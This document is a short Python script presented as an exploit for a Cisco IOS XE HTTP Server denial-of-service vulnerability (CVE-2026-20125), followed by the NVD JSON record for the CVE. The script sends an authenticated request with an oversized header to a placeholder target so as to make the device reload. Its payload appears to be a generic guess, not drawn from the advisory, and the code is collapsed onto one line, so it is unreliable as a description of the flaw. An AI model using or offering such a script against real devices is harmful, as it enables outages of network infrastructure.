CVE-2026-20125

import requests from requests.auth import HTTPBasicAuth # Exploit Title: Cisco IOS XE HTTP Server DoS (CVE-2026-20125) # Description: Sends malformed HTTP requests to trigger watchdog timer. target_url = "http://<TARGET_IP>/" username = "<USERNAME>" password = "<PASSWORD>" # Crafted malformed input to exploit improper validation malicious_headers = { "User-Agent": "Mozilla/5.0", "X-Custom-Long-Header": "A" * 5000 } try: # Send authenticated request with malicious payload # Note: Exploitation requires valid credentials (PR:L) response = requests.get( target_url, headers=malicious_headers, auth=HTTPBasicAuth(username, password), timeout=5 ) print("Request sent. Monitor device for reload.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-20125", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:16.750", "lastModified": "2026-03-26T15:13:15.790", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the HTTP Server feature of Cisco IOS Software and Cisco IOS XE Software Release 3E could allow an authenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition.\r\n\r This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malformed HTTP requests to an affected device. A successful exploit could allow the attacker to cause a watchdog timer to expire and the device to reload, resulting in a DoS condition. To exploit this vulnerability, the attacker must have a valid user account."}, {"lang": "es", "value": "Una vulnerabilidad en la característica de servidor HTTP de Cisco IOS Software y Cisco IOS XE Software Release 3E podría permitir a un atacante remoto autenticado causar que un dispositivo afectado se recargue inesperadamente, lo que resultaría en una condición de denegación de servicio (DoS). Esta vulnerabilidad se debe a una validación incorrecta de la entrada proporcionada por el usuario. Un atacante podría explotar esta vulnerabilidad enviando solicitudes HTTP malformadas a un dispositivo afectado. Un exploit exitoso podría permitir al atacante causar que un temporizador watchdog expire y que el dispositivo se recargue, lo que resultaría en una condición de DoS. Para explotar esta vulnerabilidad, el atacante debe tener una cuenta de usuario válida."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-228"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ios-http-dos-sbv8XRpL", "source": "[email protected]"}]}}